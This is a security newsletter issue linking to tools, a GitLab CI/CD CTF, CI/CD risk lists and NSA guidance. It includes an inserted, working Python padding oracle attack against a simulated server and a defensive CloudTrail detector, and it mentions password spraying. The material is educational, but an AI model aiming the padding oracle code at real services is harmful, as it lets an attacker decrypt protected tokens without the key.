[tl;dr sec] #124 - GraphQL Cop, GitLab CI/CD CTF, NSA's Network Infrastructure Security Guidance
Tool to test GraphQL APIs, learn to exploit and pivot a target GitLab instance, PDF by NSA on hardening your network.
I hope you’ve been doing well!
Last week I shared a link to a hilarious card game about pitching ridiculous, fabricated start-ups.
An example from their home page:
What a time to be alive 🤣
📢 🎟 Code To Cloud: The Security Summit For Practitioners By Practitioners
Register for the free virtual event at the intersection of Security, DevOps, and Cloud on March 23-24! You’ll learn from 20+ of the leading DevSecOps experts in 24 hours of keynotes, panels, breakout sessions, lightning talks, and hands-on labs. The Code to Cloud Summit will feature security insights across cloud-native tech stacks—from IaC and open-source packages to containers and workloads.
Speakers include Srinath Kuruvadi (Netflix), Nancy Gariché (GitHub Security Lab and OWASP DevSlop), Madhu Akula (Miro and KubernetesGoat), Shannon Lietz (Adobe), Ashish Rajan (PageUp and Cloud Security Podcast), and more.
📜 In this newsletter...
Conferences: LocoMocoSec CFP is open!
CI/CD: GitLab CI/CD themed CTF you can run in your AWS account, Top 10 CI/CD security risks
AppSec: Security for package managers, turning language doc recommendations into continuous code checks
Web Security: Tool to test GraphQL APIs for common security issues, how to Burp good, Burp extension to find and exploit PKCS padding oracles
Cloud Security: Simple Lambda to monitor CloudTrail for manual Console actions, infrastructure as data, using AWS Step functions for continuous monitoring, security dashboards as code
Network Security: Debugging certificate errors, NSA's network infra security guidance
Exploitation: Exploit mitigation overview for various OSes and apps, survey of why memory safety is still a concern
Misc: Web app to remove unwanted things from images, free online editor for animated sprites and pixel art, Simple Wikipedia, find words on the tip of your tongue, iOS app to find public restrooms
Humor: A walk sign asking you to change your password, CNCF puzzle, security vendors unmasked
LocoMocoSec 2022 CFP is Open!
A great single track conference in Hawaii 🏖️ CFP closes April 3rd.
Top 10 CI/CD Security Risks
Insufficient Flow Control Mechanisms
Inadequate Identity and Access Management
Dependency Chain Abuse
Poisoned Pipeline Execution (PPE)
Insufficient PBAC (Pipeline-Based Access Controls)
Insufficient Credential Hygiene
Insecure System Configuration
Ungoverned Usage of 3rd Party Services
Improper Artifact Integrity Validation
Insufficient Logging and Visibility
Security for package maintainers
Guide by Seth Larson on how open source package maintainers can secure their accounts, the platforms and roles for various package repositories, securing your package repository, and more.
Scaling Semgrep rule coverage by spidering language documentation
Many languages and frameworks have extensive docs, and somewhere in them, there are periodic Warning call-out blocks that say something like, “Make sure not to do this, it’s dangerous.” But who has time to read and remember hundreds of pages of docs?
Neat post by r2c’s Kurt Boberg on writing a scraper to extract all of these Warnings from the MSDN docs, so now you can get programmatically warned about dangerous C# code using open source Semgrep rules. And there’s a bunch of other new C# rules for all major OWASP vulnerability classes.
How to Burp Good
Great walkthrough by @n00py1 of how to do useful things in Burp, like: password brute forcing, password spraying, handling CSRF tokens, re-validating sessions, targeted scanning, finding hidden pages, SSL stripping, and more.
Padding Oracle Hunter
New Burp Extension by the Singapore government that helps penetration testers quickly identify and exploit PKCS#7 (CBC block padding) and PKCS#1 v1.5 (RSA) padding oracle vulnerabilities. More context by Eugene Lim.
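To show what a PKCS#7 padding oracle actually leaks, here is an added example (not the extension's code): a server that decrypts CBC ciphertexts and answers only "padding valid / invalid", and an attacker that recovers the plaintext from that one bit per query. The attack does not depend on the block cipher, so a toy 8-round Feistel network built from SHA-256 stands in for AES; the `VulnerableServer` class, the message, and all names are assumptions made for this example.

```python
import hashlib
import os

BLOCK = 16
ROUNDS = 8


def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def _f(key: bytes, half: bytes, rnd: int) -> bytes:
    # Round function of the toy cipher: a keyed hash truncated to a half block.
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[: BLOCK // 2]


def toy_encrypt_block(key: bytes, block: bytes) -> bytes:
    # Feistel network: invertible, but NOT a real cipher. It stands in for AES
    # only because the padding oracle attack is independent of the cipher.
    l, r = block[: BLOCK // 2], block[BLOCK // 2 :]
    for i in range(ROUNDS):
        l, r = r, _xor(l, _f(key, r, i))
    return l + r


def toy_decrypt_block(key: bytes, block: bytes) -> bytes:
    l, r = block[: BLOCK // 2], block[BLOCK // 2 :]
    for i in reversed(range(ROUNDS)):
        l, r = _xor(r, _f(key, l, i)), l
    return l + r


def pkcs7_pad(data: bytes) -> bytes:
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n


def pkcs7_unpad(data: bytes) -> bytes:
    if not data or len(data) % BLOCK:
        raise ValueError("bad length")
    n = data[-1]
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]


def cbc_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    out, prev = b"", iv
    for i in range(0, len(plaintext), BLOCK):
        prev = toy_encrypt_block(key, _xor(plaintext[i : i + BLOCK], prev))
        out += prev
    return out


def cbc_decrypt(key: bytes, iv: bytes, ciphertext: bytes) -> bytes:
    out, prev = b"", iv
    for i in range(0, len(ciphertext), BLOCK):
        block = ciphertext[i : i + BLOCK]
        out += _xor(toy_decrypt_block(key, block), prev)
        prev = block
    return out


class VulnerableServer:
    """Holds the key and leaks exactly one bit per query: was the padding valid?"""

    def __init__(self):
        self.key = os.urandom(16)

    def encrypt(self, message: bytes) -> bytes:
        iv = os.urandom(BLOCK)
        return iv + cbc_encrypt(self.key, iv, pkcs7_pad(message))

    def padding_is_valid(self, token: bytes) -> bool:
        try:
            pkcs7_unpad(cbc_decrypt(self.key, token[:BLOCK], token[BLOCK:]))
            return True
        except ValueError:
            return False


def padding_oracle_decrypt(oracle, token: bytes) -> bytes:
    """Recover the plaintext of an IV||ciphertext token using only the oracle."""
    blocks = [token[i : i + BLOCK] for i in range(0, len(token), BLOCK)]
    plaintext = b""
    for prev, target in zip(blocks, blocks[1:]):
        inter = bytearray(BLOCK)  # D_k(target), recovered byte by byte from the end
        for pos in range(BLOCK - 1, -1, -1):
            pad = BLOCK - pos
            for guess in range(256):
                forged = bytearray(BLOCK)
                forged[pos] = guess
                for j in range(pos + 1, BLOCK):
                    forged[j] = inter[j] ^ pad  # force already-known trailing bytes to `pad`
                if not oracle(bytes(forged) + target):
                    continue
                if pos == BLOCK - 1:
                    # Last byte: the oracle also accepts \x02\x02, \x03\x03\x03, ...
                    # Flip the byte before it and re-check; only \x01 survives.
                    forged[pos - 1] ^= 0xFF
                    if not oracle(bytes(forged) + target):
                        continue
                inter[pos] = guess ^ pad
                break
            else:
                raise RuntimeError("oracle never accepted any padding; not a padding oracle?")
        plaintext += _xor(bytes(inter), prev)
    return pkcs7_unpad(plaintext)


def demo(message: bytes = b"attack at dawn; a padding oracle leaks one bit per query") -> bytes:
    server = VulnerableServer()
    return padding_oracle_decrypt(server.padding_is_valid, server.encrypt(message))


if __name__ == "__main__":
    print(demo())
```

In a real engagement the oracle is an HTTP response (status code, error body, or response time) rather than a function call, which is what the Burp extension automates; the cost is the same, at most 256 queries per plaintext byte, and the fix is the same too: authenticate the ciphertext (AEAD, or encrypt-then-MAC) so tampered tokens are rejected before padding is ever inspected.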
Monitoring CloudTrail for manual Console actions
A simple Lambda that monitors your CloudTrail log files to find manual actions taken in your accounts, by Paul Zietsman. Valuable intel for when your cloud state is drifting out of sync with your infrastructure as code.
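As an added example of the detection logic such a Lambda needs (not Paul Zietsman's code), the block below parses a CloudTrail S3 object (gzip-compressed JSON with a top-level `Records` array) and flags state-changing calls whose User-Agent points at a human in the Console. The User-Agent patterns, the read-only name prefixes used as a fallback, and the sample records are this example's own assumptions; the records are constructed, not real log output.

```python
import gzip
import json
import re

# Assumption: these User-Agent patterns mark a person in the AWS Console (or the
# Console's internal calls). They are this example's own heuristic, not the
# tool's exact logic; tune them against your own CloudTrail data.
CONSOLE_AGENT = re.compile(
    r"console\.[a-z0-9.-]*amazonaws\.com|signin\.amazonaws\.com|^AWS Internal$"
)
# Fallback for records that lack the readOnly field: treat these prefixes as reads.
READ_PREFIXES = ("Get", "List", "Describe", "Head", "Lookup")


def is_mutating(record: dict) -> bool:
    """True for API calls that change state; prefer CloudTrail's own readOnly flag."""
    if "readOnly" in record:
        return not record["readOnly"]
    return not record["eventName"].startswith(READ_PREFIXES)


def is_console_event(record: dict) -> bool:
    """True when a person (not the CLI, an SDK, or IaC) made the call via the Console."""
    identity = record.get("userIdentity", {})
    # Calls a service makes on your behalf (e.g. CloudFormation) carry invokedBy;
    # they are automation even if a Console click started the stack.
    if identity.get("invokedBy"):
        return False
    return bool(CONSOLE_AGENT.search(record.get("userAgent", "")))


def find_manual_actions(records) -> list:
    hits = []
    for rec in records:
        if is_mutating(rec) and is_console_event(rec):
            hits.append({
                "time": rec.get("eventTime"),
                "region": rec.get("awsRegion"),
                "actor": rec.get("userIdentity", {}).get("arn", "?"),
                "action": rec["eventSource"].split(".")[0] + ":" + rec["eventName"],
            })
    return hits


def parse_log_object(body: bytes) -> list:
    """CloudTrail delivers gzip-compressed JSON with a top-level Records array to S3."""
    return json.loads(gzip.decompress(body))["Records"]


# Constructed sample records, not real CloudTrail output. The account ID is the
# AWS documentation placeholder 123456789012.
SAMPLE_RECORDS = [
    {"eventTime": "2022-03-07T09:12:01Z", "awsRegion": "us-east-1",
     "eventSource": "ec2.amazonaws.com", "eventName": "RunInstances", "readOnly": False,
     "userAgent": "console.ec2.amazonaws.com",
     "userIdentity": {"type": "AssumedRole",
                      "arn": "arn:aws:sts::123456789012:assumed-role/Admin/alice"}},
    {"eventTime": "2022-03-07T09:12:05Z", "awsRegion": "us-east-1",
     "eventSource": "ec2.amazonaws.com", "eventName": "DescribeInstances", "readOnly": True,
     "userAgent": "console.ec2.amazonaws.com",
     "userIdentity": {"type": "AssumedRole",
                      "arn": "arn:aws:sts::123456789012:assumed-role/Admin/alice"}},
    {"eventTime": "2022-03-07T09:30:44Z", "awsRegion": "us-east-1",
     "eventSource": "s3.amazonaws.com", "eventName": "CreateBucket", "readOnly": False,
     "userAgent": "APN/1.0 HashiCorp/1.0 Terraform/1.1.6 (+https://www.terraform.io)",
     "userIdentity": {"type": "AssumedRole",
                      "arn": "arn:aws:sts::123456789012:assumed-role/ci-deploy/gitlab"}},
    {"eventTime": "2022-03-07T10:02:19Z", "awsRegion": "us-east-1",
     "eventSource": "iam.amazonaws.com", "eventName": "PutRolePolicy",
     "userAgent": "console.amazonaws.com",
     "userIdentity": {"type": "IAMUser", "arn": "arn:aws:iam::123456789012:user/bob"}},
    {"eventTime": "2022-03-07T10:02:40Z", "awsRegion": "us-east-1",
     "eventSource": "lambda.amazonaws.com", "eventName": "CreateFunction20150331",
     "readOnly": False, "userAgent": "cloudformation.amazonaws.com",
     "userIdentity": {"type": "AssumedRole", "invokedBy": "cloudformation.amazonaws.com",
                      "arn": "arn:aws:sts::123456789012:assumed-role/cfn-exec/AWSCloudFormation"}},
]


def demo() -> list:
    """Round-trip the samples through the S3 object format, then hunt for manual changes."""
    body = gzip.compress(json.dumps({"Records": SAMPLE_RECORDS}).encode())
    return find_manual_actions(parse_log_object(body))


if __name__ == "__main__":
    for hit in demo():
        print(hit)
```

Of the five constructed records only two are flagged: the Console-driven `RunInstances` and `PutRolePolicy`. The Console read, the Terraform-driven bucket creation, and the CloudFormation-invoked Lambda creation are all ignored, which is the distinction that matters when the question is "who changed something outside of IaC?". In a Lambda, `parse_log_object` would be fed the S3 object body from the CloudTrail delivery notification, and the hits would go to Slack, a ticket, or a SIEM.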
Idem
A collaboration from VMware and SaltStack that aims to simplify cloud configuration by moving from Infrastructure as Code to Infrastructure as Data. It can scan your current cloud deployments and generate all the data needed to manage them. Idem can manage not just cloud providers, but any API-driven system, such as GitLab.com.
Why Step Functions is the Best AWS Service You Are Not Using
stackArmor’s Matthew Venne describes the power of using AWS Step Functions to implement continuous security monitoring, such as tracking SSL configuration status to meet FedRAMP requirements.
Recent changes make this much easier:
You can now call AWS API calls directly from State Machines instead of stitching together simple Lambdas for every action.
Workflow Studio is a slick browser-based wizard where you can drag and drop to define your flow.
Dashboards as Code with HCL + SQL
Steampipe now supports defining various Dashboards as Code, giving you real-time insight into your cloud environment, compliance posture, and more. They’ve released 79 AWS Insights dashboards that include security reports and visualizations of VPC & IAM entity relationships.
Debugging Certificate Errors
Great walkthrough by Jan Schaumann of debugging techniques for making sense of TLS certificate errors: expired cert, wrong name on the cert, incomplete cert chain, unknown root, and more.
NSA: Network Infrastructure Security Guidance
Topics covered include:
Network architecture and design
Authentication, authorization, and accounting
Logging and monitoring
Exploit Mitigations
By NCC Group: a knowledge base of exploit mitigations available across numerous operating systems (Windows, Linux, Android, iOS, and more), architectures, and applications (Firefox, Edge, Chrome, Office), broken down by version.
📢 Trail of Bits’ ZK Docs: comprehensive and interactive documentation on implementing zero-knowledge proof systems
Trail of Bits released ZKDocs: free and open source documentation for non-standardized cryptographic primitives. ZKDocs provides comprehensive implementation details and security considerations for developers using zero-knowledge proofs and other non-standard primitives. We hope this extensive collection of information will help devs avoid introducing bugs.
Whoa, ☝️ is pretty cool.
Magic Eraser - Remove unwanted things from images in seconds
Upload an image, mark the bit you need removed, download the fixed up image.
A free online editor for animated sprites & pixel art. Create animations in your browser.
Simple Wikipedia
Wikipedia, but using basic English words and shorter sentences, making it easier to read for children and people learning English.
Tip of My Tongue
Find that word that you’ve been thinking about all day but just can’t seem to remember. Search and filter by partial word, letters, word meaning, length.
Flush - Toilet Finder & Map
iOS app to help you find public restrooms.
A walk sign continually repeating “CHANGE PASSWORD”
Nothing to see here, everything is fine.
✉️ Wrapping Up
Have questions, comments, or feedback? Just reply directly, I'd love to hear from you.
If you find this newsletter useful and know other people who would too, I'd really appreciate if you'd forward it to them 🙏
Thanks for reading!